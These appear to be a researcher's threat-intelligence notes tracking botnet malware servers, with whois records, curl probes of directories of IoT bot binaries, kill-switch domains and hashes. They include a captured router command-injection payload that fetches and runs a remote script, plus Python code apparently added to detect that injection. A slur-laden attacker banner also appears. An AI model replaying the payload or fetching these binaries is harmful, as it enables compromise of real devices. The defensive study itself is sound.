OrgName:        FranTech Solutions
OrgId:          SYNDI-5
Address:        1621 Central Ave
City:           Cheyenne
StateProv:      WY
PostalCode:     82001
Country:        US
RegDate:        2010-07-21
Updated:        2017-01-28
Ref:            https://rdap.arin.net/registry/entity/SYNDI-5

212.192.246.30

SHORELINE BOTNET THA REAL SHIT NIGGA

                             Index of /bins

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       arm              2022-03-13 16:05  85K  
[   ]       arm5             2022-03-13 16:05  61K  
[   ]       arm6             2022-03-13 16:05  93K  
[   ]       arm7             2022-03-13 16:05 161K  
[   ]       i686             2022-03-13 16:05  81K  
[   ]       m68k             2022-03-13 16:05  82K  
[   ]       mips             2022-03-13 16:05  75K  
[   ]       mpsl             2022-03-13 16:05 106K  
[   ]       ppc              2022-03-13 16:05  77K  
[   ]       sh4              2022-03-13 16:05  74K  
[   ]       spc              2022-03-13 16:05  86K  
[   ]       x86              2022-03-13 16:05  73K  
$ curl -i http://212.192.246.30/bins/
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2022 15:40:45 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 3162
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /bins</title>
 </head>
 <body>
<h1>Index of /bins</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a>       </td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="arm">arm</a>                    </td><td align="right">2022-03-13 16:05  </td><td align="right"> 85K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="arm5">arm5</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right"> 61K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="arm6">arm6</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right"> 93K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="arm7">arm7</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right">161K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="i686">i686</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right"> 81K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="m68k">m68k</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right"> 82K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="mips">mips</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right"> 75K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="mpsl">mpsl</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right">106K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="ppc">ppc</a>                    </td><td align="right">2022-03-13 16:05  </td><td align="right"> 77K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="sh4">sh4</a>                    </td><td align="right">2022-03-13 16:05  </td><td align="right"> 74K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="spc">spc</a>                    </td><td align="right">2022-03-13 16:05  </td><td align="right"> 86K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="x86">x86</a>                    </td><td align="right">2022-03-13 16:05  </td><td align="right"> 73K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
inetnum:        212.192.244.0 - 212.192.247.255
netname:        Serverion
country:        NL
org:            ORG-DCB8-RIPE
admin-c:        AA35882-RIPE
tech-c:         TA7409-RIPE
status:         ASSIGNED PA
mnt-by:         RELCOMGROUP-EXT-MNT
created:        2020-10-06T20:25:28Z
last-modified:  2021-05-28T13:59:06Z
source:         RIPE

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
phone:          +31851308338
phone:          +13023803902
admin-c:        AA35882-RIPE
tech-c:         TA7409-RIPE
abuse-c:        AR60082-RIPE
mnt-ref:        mnt-nl-descapital-1
mnt-ref:        RELCOMGROUP-EXT-MNT
mnt-ref:        FREENET-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         mnt-nl-descapital-1
created:        2020-03-17T15:00:52Z
last-modified:  2022-03-15T10:56:08Z
source:         RIPE # Filtered
mnt-ref:        AZERONLINE-MNT
mnt-ref:        interlir-mnt

31.210.20.109

$ curl -i http://31.210.20.109
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2022 15:44:04 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 10 Mar 2022 22:21:40 GMT
ETag: "2-5d9e4a361fb00"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html; charset=UTF-8

X
$ curl -i http://31.210.20.109/a/
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2022 15:44:33 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 2186
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /a</title>
 </head>
 <body>
<h1>Index of /a</h1>
<ul><li><a href="/"> Parent Directory</a></li>
<li><a href="76d32be0.sh"> 76d32be0.sh</a></li>
<li><a href="b/"> b/</a></li>
<li><a href="bot.arc"> bot.arc</a></li>
<li><a href="bot.arm"> bot.arm</a></li>
<li><a href="bot.arm5"> bot.arm5</a></li>
<li><a href="bot.arm6"> bot.arm6</a></li>
<li><a href="bot.arm7"> bot.arm7</a></li>
<li><a href="bot.i686"> bot.i686</a></li>
<li><a href="bot.m68k"> bot.m68k</a></li>
<li><a href="bot.mips"> bot.mips</a></li>
<li><a href="bot.mpsl"> bot.mpsl</a></li>
<li><a href="bot.ppc"> bot.ppc</a></li>
<li><a href="bot.rm7"> bot.rm7</a></li>
<li><a href="bot.sh4"> bot.sh4</a></li>
<li><a href="bot.spc"> bot.spc</a></li>
<li><a href="bot.x86"> bot.x86</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arc"> db0fa4b8db0333367e9bda3ab68b8042.arc</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm"> db0fa4b8db0333367e9bda3ab68b8042.arm</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm5"> db0fa4b8db0333367e9bda3ab68b8042.arm5</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm6"> db0fa4b8db0333367e9bda3ab68b8042.arm6</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm7"> db0fa4b8db0333367e9bda3ab68b8042.arm7</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.i686"> db0fa4b8db0333367e9bda3ab68b8042.i686</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.m68k"> db0fa4b8db0333367e9bda3ab68b8042.m68k</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.mips"> db0fa4b8db0333367e9bda3ab68b8042.mips</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.mpsl"> db0fa4b8db0333367e9bda3ab68b8042.mpsl</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.ppc"> db0fa4b8db0333367e9bda3ab68b8042.ppc</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.sh4"> db0fa4b8db0333367e9bda3ab68b8042.sh4</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.spc"> db0fa4b8db0333367e9bda3ab68b8042.spc</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.x86"> db0fa4b8db0333367e9bda3ab68b8042.x86</a></li>
<li><a href="wget.sh"> wget.sh</a></li>
</ul>
</body></html>

45.90.160.54

inetnum:        45.90.160.0 - 45.90.160.255
netname:        FR-SAPINET-20190625
country:        FR
org:            ORG-SS1190-RIPE
admin-c:        TA8040-RIPE
tech-c:         TA8040-RIPE
status:         ALLOCATED PA
mnt-by:         SAPINET-MNT
mnt-by:         RIPE-NCC-HM-MNT
created:        2021-10-27T08:12:36Z
last-modified:  2021-10-27T08:12:36Z
source:         RIPE

organisation:   ORG-SS1190-RIPE
org-name:       Sapinet SAS
country:        FR
org-type:       LIR
address:        65 rue de la Croix
address:        92000
address:        Nanterre
address:        FRANCE
phone:          +33783049305
admin-c:        TA8040-RIPE
tech-c:         TA8040-RIPE
abuse-c:        AR63279-RIPE
mnt-ref:        SAPINET-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         SAPINET-MNT
created:        2021-06-08T10:29:40Z
last-modified:  2021-06-08T10:29:40Z
source:         RIPE # Filtered
$ curl -i http://45.90.160.54/
HTTP/1.1 403 Forbidden
Date: Sat, 09 Apr 2022 08:06:38 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

Index of /bins

[ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       onion002.arm     2022-04-06 01:30  24K  
[   ]       onion002.arm5    2022-04-06 01:30  22K  
[   ]       onion002.arm6    2022-04-06 01:30  29K  
[   ]       onion002.arm7    2022-04-06 01:30  48K  
[   ]       onion002.m68k    2022-04-06 01:30  52K  
[   ]       onion002.mips    2022-04-06 01:30  26K  
[   ]       onion002.mpsl    2022-04-06 01:30  27K  
[   ]       onion002.ppc     2022-04-06 01:30  23K  
[   ]       onion002.sh4     2022-04-06 01:30  50K  
[   ]       onion002.spc     2022-04-06 01:30  59K  
[   ]       onion002.x86     2022-04-06 01:30  24K  
══════════════════════════════════════════════════════════════
lftp 45.90.160.54
lftp 45.90.160.54:~> ls
-rwxr-xr-x    1 0        0           25004 Apr 06 01:30 onion002.arm
-rwxr-xr-x    1 0        0           22132 Apr 06 01:30 onion002.arm5
-rwxr-xr-x    1 0        0           29464 Apr 06 01:30 onion002.arm6
-rwxr-xr-x    1 0        0           48688 Apr 06 01:30 onion002.arm7
-rwxr-xr-x    1 0        0           53052 Apr 06 01:30 onion002.m68k
-rwxr-xr-x    1 0        0           26168 Apr 06 01:30 onion002.mips
-rwxr-xr-x    1 0        0           27244 Apr 06 01:30 onion002.mpsl
-rwxr-xr-x    1 0        0           23944 Apr 06 01:30 onion002.ppc
-rwxr-xr-x    1 0        0           51584 Apr 06 01:30 onion002.sh4
-rwxr-xr-x    1 0        0           60412 Apr 06 01:30 onion002.spc
-rwxr-xr-x    1 0        0           24728 Apr 06 01:30 onion002.x86
-rw-r--r--    1 0        0            2007 Apr 06 01:39 sora1.sh
$ curl -i http://45.90.160.54/bins/
HTTP/1.1 200 OK
Date: Sat, 09 Apr 2022 08:05:28 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 3053
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /bins</title>
 </head>
 <body>
<h1>Index of /bins</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a>       </td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.arm">onion002.arm</a>           </td><td align="right">2022-04-06 01:30  </td><td align="right"> 24K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.arm5">onion002.arm5</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 22K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.arm6">onion002.arm6</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 29K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.arm7">onion002.arm7</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 48K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.m68k">onion002.m68k</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 52K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.mips">onion002.mips</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 26K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.mpsl">onion002.mpsl</a>          </td><td align="right">2022-04-06 01:30  </td><td align="right"> 27K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.ppc">onion002.ppc</a>           </td><td align="right">2022-04-06 01:30  </td><td align="right"> 23K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.sh4">onion002.sh4</a>           </td><td align="right">2022-04-06 01:30  </td><td align="right"> 50K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.spc">onion002.spc</a>           </td><td align="right">2022-04-06 01:30  </td><td align="right"> 59K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="onion002.x86">onion002.x86</a>           </td><td align="right">2022-04-06 01:30  </td><td align="right"> 24K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
</body></html>

107.174.137.24

$ curl -i 107.174.137.24
HTTP/1.1 403 Forbidden
Date: Sat, 09 Apr 2022 08:49:48 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
NetRange:       107.172.0.0 - 107.175.255.255
CIDR:           107.172.0.0/14
NetName:        CC-17
NetHandle:      NET-107-172-0-0-1
Parent:         NET107 (NET-107-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS36352
Organization:   ColoCrossing (VGS-9)
RegDate:        2013-12-27
Updated:        2013-12-27
Ref:            https://rdap.arin.net/registry/ip/107.172.0.0

OrgName:        ColoCrossing
OrgId:          VGS-9
Address:        325 Delaware Avenue
Address:        Suite 300
City:           Buffalo
StateProv:      NY
PostalCode:     14202
Country:        US
RegDate:        2005-06-20
Updated:        2019-10-17
Ref:            https://rdap.arin.net/registry/entity/VGS-9

51.81.133.91

% No abuse contact registered for 51.81.0.0 - 51.81.255.255

inetnum:        51.81.0.0 - 51.81.255.255
netname:        NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr:          IPv4 address block not managed by the RIPE NCC
remarks:        ------------------------------------------------------
remarks:
remarks:        For registration information,
remarks:        you can consult the following sources:
remarks:
remarks:        IANA
remarks:        http://www.iana.org/assignments/ipv4-address-space
remarks:        http://www.iana.org/assignments/iana-ipv4-special-registry
remarks:        http://www.iana.org/assignments/ipv4-recovered-address-space
remarks:
remarks:        AFRINIC (Africa)
remarks:        http://www.afrinic.net/ whois.afrinic.net
remarks:
remarks:        APNIC (Asia Pacific)
remarks:        http://www.apnic.net/ whois.apnic.net
remarks:
remarks:        ARIN (Northern America)
remarks:        http://www.arin.net/ whois.arin.net
remarks:
remarks:        LACNIC (Latin America and the Carribean)
remarks:        http://www.lacnic.net/ whois.lacnic.net
remarks:
remarks:        ------------------------------------------------------
country:        EU # Country is really world wide
admin-c:        IANA1-RIPE
tech-c:         IANA1-RIPE
status:         ALLOCATED UNSPECIFIED
mnt-by:         RIPE-NCC-HM-MNT
created:        2019-03-11T16:33:15Z
last-modified:  2019-03-11T16:33:15Z
source:         RIPE
$ curl -i http://51.81.133.91/
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2022 04:04:33 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 12 Apr 2022 03:23:12 GMT
ETag: "13-5dc6c94b3bfe0"
Accept-Ranges: bytes
Content-Length: 19
Content-Type: text/html; charset=UTF-8

MTM v2.6 Was here.
$ curl -i http://51.81.133.91/FKKK/
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2022 04:03:39 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 12 Apr 2022 03:23:12 GMT
ETag: "4-5dc6c94b3bfe0"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html; charset=UTF-8

Hey
$ curl -i stresser.pw
HTTP/1.1 301 Moved Permanently
Date: Fri, 22 Apr 2022 04:22:04 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Fri, 22 Apr 2022 05:22:04 GMT
Location: https://cryptostresser.com
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=egX7%2FmZbvSA5f2fWJV6HNhnKrExpq9%2FCmooO%2BRh%2Fg7X3ob47VGICKg1WiLzyr8I21XGICczFb3asyHsCBq%2BCc7Bp8PmUFmUHOqoZavSiezgUVCZEjfaGnQ1wzki6dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6ffb93886f537762-LHR
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

https://documents.trendmicro.com/assets/pdf/APPENDIX_Back-to-Back%20Campaigns.pdf

163.179.162.206

inetnum:        163.179.0.0 - 163.179.255.255
netname:        UNICOM-GD
descr:          China Unicom Guangdong province network
descr:          China Unicom
country:        CN
admin-c:        CH1302-AP
tech-c:         RP181-AP
remarks:        service provider
mnt-by:         APNIC-HM
mnt-lower:      MAINT-CNCGROUP-GD
mnt-routes:     MAINT-CNCGROUP-RR
mnt-irt:        IRT-CU-CN
status:         ALLOCATED PORTABLE
remarks:        --------------------------------------------------------
remarks:        To report network abuse, please contact mnt-irt
remarks:        For troubleshooting, please contact tech-c and admin-c
remarks:        Report invalid contact via www.apnic.net/invalidcontact
remarks:        --------------------------------------------------------
last-modified:  2016-05-04T00:30:26Z
source:         APNIC

irt:            IRT-CU-CN
address:        No.21,Financial Street
address:        Beijing,100033
address:        P.R.China
e-mail:         hqs-ipabuse@chinaunicom.cn
abuse-mailbox:  hqs-ipabuse@chinaunicom.cn
admin-c:        CH1302-AP
tech-c:         CH1302-AP
auth:           # Filtered
mnt-by:         MAINT-CNCGROUP
last-modified:  2017-10-23T05:59:13Z
source:         APNIC

person:         ChinaUnicom Hostmaster
nic-hdl:        CH1302-AP
e-mail:         hqs-ipabuse@chinaunicom.cn
address:        No.21,Jin-Rong Street
address:        Beijing,100033
address:        P.R.China
phone:          +86-10-66259764
fax-no:         +86-10-66259764
country:        CN
mnt-by:         MAINT-CNCGROUP
last-modified:  2017-08-17T06:13:16Z
source:         APNIC

person:         runkeng pan
nic-hdl:        RP181-AP
e-mail:         gdipnoc@chinaunicom.cn
address:        XinShiKong Plaza,No 666 Huangpu Rd. Guangzhou 510627,China
phone:          +86-20-22214174
fax-no:         +86-20-22212266-4174
country:        CN
mnt-by:         MAINT-CNCGROUP-GD
last-modified:  2015-12-16T03:32:02Z
source:         APNIC
$ curl -i http://163.179.162.206:38334/Mozi.m
HTTP/1.1 200 OK
Server: nginx
Content-Length: 108808
Connection: close
Content-Type: application/zip

23.95.186.164

From HTTP POST:

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$(busybox+wget+http://23.95.186.164/cache+-O+->+/dev/.p;sh+/dev/.p)&ipv=0
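The body above is an OS command injection attempt against a router's diagnostic "ping" page: the dest_host field carries a command substitution that fetches and runs a second stage instead of a host to ping. As an added example (not code from these notes or from any vendor), the Python below decodes a form body of this shape and flags a dest_host that is not a plain hostname or IP, or that contains shell metacharacters or a fetch-then-execute chain. The field names are taken from the captured request; the rule set, the HOST_OR_IP pattern and the benign sample are this example's own assumptions.

```python
"""Detect OS command injection in a router diagnostic 'ping' form post.

Added example, not code from the honeypot notes. It decodes an
application/x-www-form-urlencoded body like the captured one and reports
why a dest_host value is suspicious. Field names come from the captured
request; the rules below are this example's own.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample: the POST body captured above, verbatim.
CAPTURED_BODY = (
    "XWebPageName=diag&diag_action=ping&wan_conlist=0"
    "&dest_host=$(busybox+wget+http://23.95.186.164/cache+-O+->+/dev/.p;sh+/dev/.p)&ipv=0"
)
# Constructed sample: what a legitimate use of the same form looks like.
BENIGN_BODY = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=example.com&ipv=0"

# A ping target should be nothing but hostname/IP characters (':' for IPv6).
HOST_OR_IP = re.compile(r"^[A-Za-z0-9.:-]{1,253}$")

# Each rule names one injection primitive seen in the value after decoding.
RULES = [
    ("command_substitution", re.compile(r"\$\(|`")),
    ("command_chaining", re.compile(r"[;|&\n]")),
    ("redirection", re.compile(r"[<>]")),
    # download tool somewhere before an interpreter or chmod: fetch-and-run
    ("fetch_and_run", re.compile(r"\b(?:wget|curl|tftp|ftpget)\b.*\b(?:sh|bash|chmod)\b")),
]


def parse_form(body):
    """Split a form body into a dict the way a CGI would (first value wins).

    Done by hand rather than with urllib.parse.parse_qs so that a ';'
    inside a value is kept as part of the value, not treated as a separator.
    """
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def inspect_ping_request(body):
    """Return (decoded dest_host, list of finding names); an empty list means clean."""
    params = parse_form(body)
    host = params.get("dest_host", "")
    findings = []
    if not HOST_OR_IP.match(host):
        findings.append("not_a_hostname")
    for name, pattern in RULES:
        if pattern.search(host):
            findings.append(name)
    return host, findings


if __name__ == "__main__":
    for label, body in (("captured", CAPTURED_BODY), ("benign", BENIGN_BODY)):
        host, findings = inspect_ping_request(body)
        print(f"{label}: dest_host={host!r} findings={findings}")
```

The same decode-then-inspect step works as a WAF or IDS rule on the decoded value: matching the raw body alone misses payloads that URL-encode the `$(` or `;` characters, which is why the check runs after unquote_plus.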
NetRange:       23.94.0.0 - 23.95.255.255
CIDR:           23.94.0.0/15
NetName:        CC-16
NetHandle:      NET-23-94-0-0-1
Parent:         NET23 (NET-23-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS36352
Organization:   ColoCrossing (VGS-9)
RegDate:        2013-08-16
Updated:        2013-08-16
Ref:            https://rdap.arin.net/registry/ip/23.94.0.0

OrgName:        ColoCrossing
OrgId:          VGS-9
Address:        325 Delaware Avenue
Address:        Suite 300
City:           Buffalo
StateProv:      NY
PostalCode:     14202
Country:        US
RegDate:        2005-06-20
Updated:        2019-10-17
Ref:            https://rdap.arin.net/registry/entity/VGS-9
$ curl -i http://23.95.186.164
HTTP/1.1 403 Forbidden
Date: Tue, 26 Apr 2022 21:36:50 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<title>Apache HTTP Server Test Page powered by CentOS</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

107.175.215.224

NetRange:       107.172.0.0 - 107.175.255.255
CIDR:           107.172.0.0/14
NetName:        CC-17
NetHandle:      NET-107-172-0-0-1
Parent:         NET107 (NET-107-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS36352
Organization:   ColoCrossing (VGS-9)
RegDate:        2013-12-27
Updated:        2013-12-27
Ref:            https://rdap.arin.net/registry/ip/107.172.0.0

OrgName:        ColoCrossing
OrgId:          VGS-9
Address:        325 Delaware Avenue
Address:        Suite 300
City:           Buffalo
StateProv:      NY
PostalCode:     14202
Country:        US
RegDate:        2005-06-20
Updated:        2019-10-17
Ref:            https://rdap.arin.net/registry/entity/VGS-9
$ curl -i 107.175.215.224
HTTP/1.1 403 Forbidden
Date: Wed, 04 May 2022 01:07:51 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

61.177.137.133

keikaku doori!
inetnum:        61.177.137.128 - 61.177.137.135
netname:        wuxi-Freshwater-Fisheries-Center
descr:          wuxi Freshwater Fisheries Research Center
descr:          Wuxi City
descr:          Jiangsu Province
country:        CN
admin-c:        CH456-AP
tech-c:         CH456-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-CHINANET-JS
mnt-lower:      MAINT-CHINANET-JS-WX
last-modified:  2010-07-22T01:52:02Z
source:         APNIC

person:         CHINANET-JS-WX Hostmaster
address:        No.3,Jiankang Road,Wuxi 214001
country:        CN
phone:          +86-510-2730813
fax-no:         +86-510-2700519
e-mail:         jsipmanager@163.com
nic-hdl:        CH456-AP
remarks:        send anti-spam or abuse reports to jsipmanager@163.com
remarks:        times in GMT+8
mnt-by:         MAINT-CHINANET-JS-WX
last-modified:  2022-03-15T07:12:25Z
source:         APNIC
$ curl -i http://61.177.137.133/x/
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 961
Date: Wed, 04 May 2022 02:34:58 GMT

<html><head><title>Apache Tomcat/7.0.26 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /x/</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/x/</u></p><p><b>description</b> <u>The requested resource (/x/) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.26</h3></body></html>

213.232.235.203

inetnum:        213.232.235.128 - 213.232.235.255
org:            ORG-AS895-RIPE
netname:        AlexHost
country:        MD
admin-c:        SZ3268-RIPE
tech-c:         SZ3268-RIPE
status:         ASSIGNED PA
mnt-by:         IPSMAIN
created:        2021-10-07T15:25:09Z
last-modified:  2021-10-07T15:25:09Z
source:         RIPE
mnt-domains:    CLOUDATAMD-MNT
mnt-lower:      CLOUDATAMD-MNT
mnt-routes:     CLOUDATAMD-MNT

organisation:   ORG-AS895-RIPE
org-name:       ALEXHOST SRL
org-type:       OTHER
address:        str. C. Brancusi nr. 3, Chisinau, Moldova
abuse-c:        AR18916-RIPE
mnt-ref:        MNT-GLBTX
mnt-ref:        FREENET-MNT
mnt-ref:        IPSMAIN
mnt-by:         IPSMAIN
created:        2021-02-08T19:58:24Z
last-modified:  2022-03-09T16:27:19Z
source:         RIPE # Filtered
$ curl -i http://213.232.235.203/
HTTP/1.1 403 Forbidden
Date: Thu, 05 May 2022 18:20:52 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
</body></html>

Original sinkholed link:

http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Variant link:

http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com

Mostly just Chinese porn. Strange way of bypassing detections I guess, but not sure what the point is. Only very obscure security researchers are ever going to see this link…

Attack on mapfre.net

MD5 Hash: 0e4fd3b90dbfb706f38d70af3e28d752

SHA1 Hash: e5c2991a028bebe5c086836fa2d9f7769c3de189

